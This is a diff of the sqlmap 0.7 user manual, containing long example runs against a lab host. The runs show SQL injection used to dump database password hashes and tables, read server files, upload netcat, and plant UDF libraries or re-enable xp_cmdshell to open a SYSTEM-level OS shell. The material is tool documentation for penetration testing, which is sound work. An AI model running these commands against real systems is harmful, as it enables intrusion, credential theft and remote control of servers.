/sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200): @@ -1694,7 +1683,7 @@ Content-Type: text/html [hh:mm:51] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200): @@ -1716,7 +1705,7 @@ Content-Type: text/html [hh:mm:51] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200): @@ -2143,7 +2132,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200): @@ -2324,7 +2313,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -v 1 [hh:mm:38] [INFO] testing Oracle [hh:mm:38] [INFO] confirming Oracle [hh:mm:38] [INFO] the back-end DBMS is Oracle -[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1 +[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION +WHERE ROWNUM=1 [hh:mm:38] [INFO] retrieved: 10 [hh:mm:38] [INFO] performed 20 queries in 0 seconds web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) @@ -2699,11 +2689,11 @@ Example on a MySQL 5.0.67 target: $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0 [*] debian-sys-maint [1]: - password hash: *BBDC22D2B1E18F8628B2922864A621B32A1B1892 + password hash: *BBDC22D2B1E18C8628D29228649621B32A1B1892 [*] root [1]: - password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B + password hash: *81F5E21235407A884A6CD4A731FEBFB6AF209E1B [*] testuser [1]: - password hash: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 + password hash: *00E247BD5F9AF26AE0194B71E1E769D1E1429A29

@@ -2719,12 +2709,12 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --pas database management system users password hashes: [*] sa [1]: - password hash: 0x01000e16d704aa252b7c38d1aeae18756e98172f4b34104d8ee32c2f01b293b03edb7491f + password hash: 0x01000a16d704fa252b7c38d1aeae18756e98172f4b34104d8ce32c2f01b293b03edb7491f ba9930b62ee5d506955 header: 0x0100 - salt: 0e16d704 - mixedcase: aa252b7c38d1aeae18756e98172f4b34104d8ee3 - uppercase: 2c2f01b293b03edb7491fba9930b62ee5d506955 + salt: 0a16d704 + mixedcase: fa252b7c38d1aeae18756e98172f4b34104d8ee3 + uppercase: 2c2f01b293b03edb7491fba9930b62ce5d506955

@@ -2764,7 +2754,7 @@ CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1 [hh:mm:51] [INFO] performed 251 queries in 2 seconds database management system users password hashes: [*] postgres [1]: - password hash: md5d7d880f96044b72d0bba108ace96d1e4 + password hash: md5d7d880f96034b72d0bba108afe96c1e7 @@ -3229,7 +3219,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | NULL | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3281,7 +3271,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3294,7 +3284,7 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv "1","luther","blissett" "2","fluffy","bunny" "3","wu","ming" -"4","sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)","user agent header" +"4","sqlmap/0.7 (http://sqlmap.sourceforge.net)","user agent header" "5","","nameisnull" @@ -3322,7 +3312,7 @@ Table: users +----+----------------------------------------------+-------------------+ | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | +----+----------------------------------------------+-------------------+ @@ -3354,7 +3344,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | NULL | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3443,7 +3433,7 @@ Table: users +----+----------------------------------------------+-------------------+ | id | name | surname | +----+----------------------------------------------+-------------------+ -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 2 | fluffy | bunny | | 1 | luther | blisset | | 3 | wu | ming | @@ -3663,7 +3653,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql sql> [TAB TAB] LIMIT -(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y' +(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) +LIMIT 0, 1)='Y' AND ORD(MID((%s), %d, 1)) > %d CAST(%s AS CHAR(10000)) COUNT(%s) @@ -3676,7 +3667,8 @@ MID((%s), %d, %d) ORDER BY %s ASC SELECT %s FROM %s.%s SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) -SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s' +SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND +table_schema='%s' SELECT grantee FROM information_schema.USER_PRIVILEGES SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES SELECT schema_name FROM information_schema.SCHEMATA @@ -3731,10 +3723,12 @@ table_schema=CHAR(116,101,115,116) LIMIT 2, 1 [hh:mm:48] [INFO] performed 55 queries in 0 seconds [hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users [hh:mm:48] [INPUT] can the SQL query provided return multiple entries? [Y/n] y -[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM test.users +[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM +test.users [hh:mm:04] [INFO] retrieved: 5 [hh:mm:04] [INFO] performed 13 queries in 0 seconds -[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many entries +[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many +entries do you want to retrieve? [a] All (default) [#] Specific number @@ -3749,8 +3743,8 @@ ORDER BY id ASC LIMIT 0, 1 ORDER BY id ASC LIMIT 0, 1 [hh:mm:09] [INFO] retrieved: luther [hh:mm:09] [INFO] performed 48 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 0, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 0, 1 [hh:mm:09] [INFO] retrieved: blissett [hh:mm:09] [INFO] performed 62 queries in 0 seconds [hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users @@ -3761,8 +3755,8 @@ ORDER BY id ASC LIMIT 1, 1 ORDER BY id ASC LIMIT 1, 1 [hh:mm:09] [INFO] retrieved: fluffy [hh:mm:09] [INFO] performed 48 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 1, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 1, 1 [hh:mm:09] [INFO] retrieved: bunny [hh:mm:09] [INFO] performed 41 queries in 0 seconds [hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users @@ -3773,8 +3767,8 @@ ORDER BY id ASC LIMIT 2, 1 ORDER BY id ASC LIMIT 2, 1 [hh:mm:09] [INFO] retrieved: wu [hh:mm:09] [INFO] performed 20 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 2, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 2, 1 [hh:mm:09] [INFO] retrieved: ming [hh:mm:10] [INFO] performed 34 queries in 0 seconds SELECT * FROM test.users [3]: @@ -3799,7 +3793,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql [...] back-end DBMS: PostgreSQL -[10:11:42] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER +[10:hh:mm] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER sql> SELECT COUNT(name) FROM users [10:11:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' [10:11:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n @@ -3812,8 +3806,8 @@ SELECT COUNT(name) FROM users: '4' sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell'); [10:12:35] [INFO] testing stacked queries support on parameter 'id' [10:12:40] [INFO] the web application supports stacked queries on parameter 'id' -[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users (id, name, surname) -VALUES (5, 'from', 'sql shell');' +[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users +(id, name, surname) VALUES (5, 'from', 'sql shell');' [10:12:40] [INFO] done sql> SELECT COUNT(name) FROM users [10:12:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' @@ -3847,21 +3841,23 @@ Option: --read-file

It is possible to retrieve the content of files from the underlying file -system when the back-end database management is system is either MySQL, -PostgreSQL or Microsoft SQL Server. +system when the back-end database management system is either MySQL, +PostgreSQL or Microsoft SQL Server and the session user has the needed +privileges to abuse database specific functionalities and architectural +weaknesses. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

-The techniques implemented are detailed on the white paper +These techniques are detailed on the white paper .

-Example on a PostgreSQL 8.3.5 target: +Example on a PostgreSQL 8.3.5 target to retrieve a text file: -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --read-file \ - "C:\example.txt" -v2 +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \ + --read-file "C:\example.txt" -v 2 [...] [hh:mm:53] [INFO] the back-end DBMS is PostgreSQL @@ -3917,6 +3913,49 @@ $ cat output/192.168.1.121/files/C__example.txt This is a text file +

+Example on a Microsoft SQL Server 2005 Service Pack 0 target to +retrieve a binary file: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --read-file "C:\example.exe" --union-use -v 1 + +[...] +[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:49] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing +technique +[hh:mm:49] [INFO] confirming full inband sql injection on parameter 'name' +[hh:mm:49] [WARNING] the target url is not affected by an exploitable full inband sql +injection vulnerability +[hh:mm:49] [INFO] confirming partial (single entry) inband sql injection on parameter +'name' by appending a false condition after the parameter value +[hh:mm:49] [INFO] the target url is affected by an exploitable partial (single entry) +inband sql injection vulnerability +valid union: 'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION +ALL SELECT NULL, NULL, NULL-- AND 'sjOfJ'='sjOfJ' + +[hh:mm:49] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:54] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:54] [INFO] fetching file: 'C:/example.exe' +[hh:mm:54] [INFO] the SQL query provided returns 3 entries +C:/example.exe file saved to: '/home/inquis/sqlmap/output/192.168.1.121/files/ +C__example.exe' + +[hh:mm:54] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/ +192.168.1.121' + +$ ls -l output/192.168.1.121/files/C__example.exe +-rw-r--r-- 1 inquis inquis 2560 2009-MM-DD hh:mm output/192.168.1.121/files/C__example.exe + +$ file output/192.168.1.121/files/C__example.exe +output/192.168.1.121/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit + + Write a local file on the back-end DBMS file system @@ -3925,69 +3964,385 @@ Options: --write-file and --dest-file

It is possible to upload a local file to the underlying file system when -the back-end database management is system is either MySQL, PostgreSQL or -Microsoft SQL Server. +the back-end database management system is either MySQL, PostgreSQL or +Microsoft SQL Server and the session user has the needed privileges to +abuse database specific functionalities and architectural weaknesses. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

-The techniques implemented are detailed on the white paper +These techniques are detailed on the white paper .

-Example on a MySQL 5.0.67 target: +Example on a MySQL 5.0.67 target to upload a binary UPX-compressed +file: -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --write-file \ - "/home/inquis/software/netcat/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1 +$ file /tmp/nc.exe.packed +/tmp/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit + +$ ls -l /tmp/nc.exe.packed +-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" --write-file \ + "/tmp/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1 [...] -[01:12:29] [INFO] the back-end DBMS is MySQL +[hh:mm:29] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2003 or 2008 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: MySQL >= 5.0.0 -[01:12:29] [INFO] testing stacked queries support on parameter 'id' -[01:12:29] [INFO] detecting back-end DBMS version from its banner -[01:12:29] [INFO] retrieved: 5.0.67 -[01:12:36] [INFO] the web application supports stacked queries on parameter 'id' -[01:12:36] [INFO] fingerprinting the back-end DBMS operating system -[01:12:36] [INFO] retrieved: C -[01:12:36] [INFO] the back-end DBMS operating system is Windows +[hh:mm:29] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:29] [INFO] detecting back-end DBMS version from its banner +[hh:mm:29] [INFO] retrieved: 5.0.67 +[hh:mm:36] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:36] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:36] [INFO] retrieved: C +[hh:mm:36] [INFO] the back-end DBMS operating system is Windows do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully written on the back-end DBMS file system? [Y/n] y -[01:12:52] [INFO] retrieved: 31744 -[01:12:52] [INFO] the file has been successfully written and its size is 31744 bytes, same -size as the local file '/home/inquis/software/netcat/nc.exe.packed' +[hh:mm:52] [INFO] retrieved: 31744 +[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, +same size as the local file '/tmp/nc.exe.packed' Operating system access -Execute an operating system command +Execute arbitrary operating system command

-Option: --os-cmd +Options: --os-cmd and --os-shell

-TODO +It is possible to execute arbitrary commands on the underlying operating +system when the back-end database management system is either MySQL, +PostgreSQL or Microsoft SQL Server and the session user has the needed +privileges to abuse database specific functionalities and architectural +weaknesses.

-The techniques implemented are detailed on the white paper +On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality +demonstrated above) a shared library (binary file) containing two +user-defined functions, sys_exec() and sys_eval(), then +it creates these two functions on the database and call one of them to +execute the specified command, depending on the user's choice to display +the standard output or not. +On Microsoft SQL Server, sqlmap abuses the xp_cmshell stored +procedure: if it's disable sqlmap re-enables it, if it does not exist, +sqlmap creates it from scratch. + +

+If the user wants to retrieve the command standard output, sqlmap will use +one of the enumeration SQL injection techniques (blind or inband) to +retrieve it, viceversa sqlmap will use the stacked query SQL injection +technique to execute the command without returning anything to the user. + +

+These techniques are detailed on the white paper . - -Prompt for an interactive operating system shell +

+It is possible to specify a single command to be executed with the +--os-cmd option.

-Option: --os-shell +Example on a PostgreSQL 8.3.5 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \ + --os-cmd "whoami" -v 1 + +[...] +[hh:mm:05] [INFO] the back-end DBMS is PostgreSQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: PostgreSQL + +[hh:mm:05] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:05] [INFO] detecting back-end DBMS version from its banner +[hh:mm:05] [INFO] retrieved: 8.3.5, +[hh:mm:15] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:15] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:15] [INFO] retrieved: 1 +[hh:mm:16] [INFO] the back-end DBMS operating system is Windows +[hh:mm:16] [INFO] testing if current user is DBA +[hh:mm:16] [INFO] retrieved: 1 +[hh:mm:16] [INFO] checking if sys_exec UDF already exist +[hh:mm:16] [INFO] retrieved: 0 +[hh:mm:18] [INFO] checking if sys_eval UDF already exist +[hh:mm:18] [INFO] retrieved: 0 +[hh:mm:20] [INFO] creating sys_exec UDF from the binary UDF file +[hh:mm:20] [INFO] creating sys_eval UDF from the binary UDF file +do you want to retrieve the command standard output? [Y/n] +[hh:mm:35] [INFO] retrieved: w2k3dev\postgres +command standard output: 'w2k3dev\postgres' +

-TODO +Example on a Microsoft SQL Server 2005 Service Pack 0 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --os-cmd "whoami" --union-use -v 1 + +[...] +[hh:mm:58] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:58] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing +technique +[hh:mm:58] [INFO] confirming full inband sql injection on parameter 'name' +[hh:mm:58] [WARNING] the target url is not affected by an exploitable full inband sql +injection vulnerability +[hh:mm:58] [INFO] confirming partial (single entry) inband sql injection on parameter 'name' +by appending a false condition after the parameter value +[hh:mm:58] [INFO] the target url is affected by an exploitable partial (single entry) inband +sql injection vulnerability +valid union: 'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION +ALL SELECT NULL, NULL, NULL-- AND 'SonLv'='SonLv' + +[hh:mm:58] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:03] [INFO] testing if current user is DBA +[hh:mm:03] [INFO] checking if xp_cmdshell extended procedure is available, wait.. +[hh:mm:09] [INFO] xp_cmdshell extended procedure is available +do you want to retrieve the command standard output? [Y/n] +[hh:mm:11] [INFO] the SQL query provided returns 1 entries +command standard output: +--- +nt authority\network service +--- +

-The techniques implemented are detailed on the white paper -. +It is also possible to simulate a real shell where you can type as many +arbitrary commands as you wish. The option is --os-shell and has +the same TAB completion and history functionalities implemented for +--sql-shell. + +

+Example on a MySQL 5.0.67 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \ + --os-shell -v 2 + +[...] +[hh:mm:36] [INFO] the back-end DBMS is MySQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: MySQL >= 5.0.0 + +[hh:mm:36] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:36] [INFO] detecting back-end DBMS version from its banner +[hh:mm:36] [DEBUG] query: IFNULL(CAST(MID((VERSION()), 1, 6) AS CHAR(10000)), CHAR(32)) +[hh:mm:36] [INFO] retrieved: 5.0.67 +[hh:mm:37] [DEBUG] performed 49 queries in 1 seconds +[hh:mm:37] [DEBUG] query: SELECT SLEEP(5) +[hh:mm:42] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:42] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:42] [DEBUG] query: CREATE TABLE sqlmapfile(data text) +[hh:mm:42] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION()) +[hh:mm:42] [DEBUG] query: SELECT IFNULL(CAST(MID(@@datadir, 1, 1) AS CHAR(10000)), CHAR(32)) +[hh:mm:42] [INFO] retrieved: C +[hh:mm:42] [DEBUG] performed 14 queries in 0 seconds +[hh:mm:42] [INFO] the back-end DBMS operating system is Windows +[hh:mm:42] [DEBUG] cleaning up the database management system +[hh:mm:42] [DEBUG] removing support tables +[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:42] [INFO] testing if current user is DBA +[hh:mm:42] [DEBUG] query: SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user= +(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END) +[hh:mm:42] [INFO] retrieved: 1 +[hh:mm:43] [DEBUG] performed 5 queries in 0 seconds +[hh:mm:43] [INFO] checking if sys_exec UDF already exist +[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name= +CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=CHAR(115,121,115,95,101,120,101,99)) +THEN 1 ELSE 0 END) +[hh:mm:43] [INFO] retrieved: 0 +[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds +[hh:mm:43] [INFO] checking if sys_eval UDF already exist +[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name= +CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=CHAR(115,121,115,95,101,118,97,108)) +THEN 1 ELSE 0 END) +[hh:mm:43] [INFO] retrieved: 0 +[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds +[hh:mm:43] [DEBUG] going to upload the binary file with stacked query SQL injection technique +[hh:mm:43] [DEBUG] creating a support table to write the hexadecimal encoded file to +[hh:mm:43] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:43] [DEBUG] query: CREATE TABLE sqlmapfile(data longblob) +[hh:mm:43] [DEBUG] encoding file to its hexadecimal string value +[hh:mm:43] [DEBUG] forging SQL statements to write the hexadecimal encoded file to the +support table +[hh:mm:43] [DEBUG] inserting the hexadecimal encoded file to the support table +[hh:mm:43] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (0x4d5a90 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xffcbff [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x490068 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x1c5485 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x14cc63 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x207665 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x5c5379 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x0e5bc2 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x505357 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...]) +[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x696372 [...]) +[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xdd8400 [...]) +[hh:mm:44] [DEBUG] exporting the binary file content to file './libsqlmapudftxxgk.dll' +[hh:mm:44] [DEBUG] query: SELECT data FROM sqlmapfile INTO DUMPFILE './libsqlmapudftxxgk.dll' +[hh:mm:44] [DEBUG] cleaning up the database management system +[hh:mm:44] [DEBUG] removing support tables +[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:44] [INFO] creating sys_exec UDF from the binary UDF file +[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_exec +[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_exec RETURNS int SONAME 'libsqlmapudftxxgk.dll' +[hh:mm:44] [INFO] creating sys_eval UDF from the binary UDF file +[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_eval +[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_eval RETURNS string SONAME +'libsqlmapudftxxgk.dll' +[hh:mm:44] [DEBUG] creating a support table to write commands standard output to +[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapoutput +[hh:mm:44] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext) +[hh:mm:44] [INFO] going to use injected sys_eval and sys_exec user-defined functions for +operating system command execution +[hh:mm:44] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER +os-shell> whoami +do you want to retrieve the command standard output? [Y/n] +[hh:mm:41] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('whoami')) +[hh:mm:41] [DEBUG] query: SELECT IFNULL(CAST(data AS CHAR(10000)), CHAR(32)) FROM +sqlmapoutput +[hh:mm:41] [INFO] retrieved: nt authority\system +[hh:mm:44] [DEBUG] performed 140 queries in 2 seconds +[hh:mm:44] [DEBUG] query: DELETE FROM sqlmapoutput +command standard output: 'nt authority\system' + +os-shell> [TAB TAB] +copy del dir echo md mem move +net netstat -na ver whoami xcopy + +os-shell> exit +[hh:mm:51] [INFO] cleaning up the database management system +[hh:mm:51] [DEBUG] removing support tables +[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapoutput +do you want to remove sys_exec UDF? [Y/n] n +do you want to remove sys_eval UDF? [Y/n] n +[hh:mm:04] [INFO] database management system cleanup finished +[hh:mm:04] [WARNING] remember that UDF dynamic-link library files saved on the file system +can only be deleted manually + + +

+Now run it again, but specifying the --union-use to retrieve the +command standard output quicker, via UNION based SQL injection, when the +parameter is affected also by inband SQL injection vulnerability: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \ + --os-shell -v 2 --union-use + +[...] +[hh:mm:16] [INFO] the back-end DBMS is MySQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: MySQL >= 5.0.0 + +[hh:mm:16] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing +technique +[hh:mm:16] [INFO] confirming full inband sql injection on parameter 'id' +[hh:mm:16] [INFO] the target url is affected by an exploitable full inband sql injection +vulnerability +valid union: 'http://192.168.1.121:80/sqlmap/mysql/iis/get_int.aspx?id=1 UNION ALL SELECT +NULL, NULL, NULL# AND 528=528' + +[hh:mm:16] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:16] [INFO] detecting back-end DBMS version from its banner +[hh:mm:16] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77), +MID((VERSION()), 1, 6),CHAR(117,114,115,75,117,102)), NULL# AND 3173=3173 +[hh:mm:16] [DEBUG] performed 1 queries in 0 seconds +[hh:mm:16] [DEBUG] query: SELECT SLEEP(5) +[hh:mm:21] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:21] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:21] [DEBUG] query: CREATE TABLE sqlmapfile(data text) +[hh:mm:21] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION()) +[hh:mm:21] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77), +MID(@@datadir, 1, 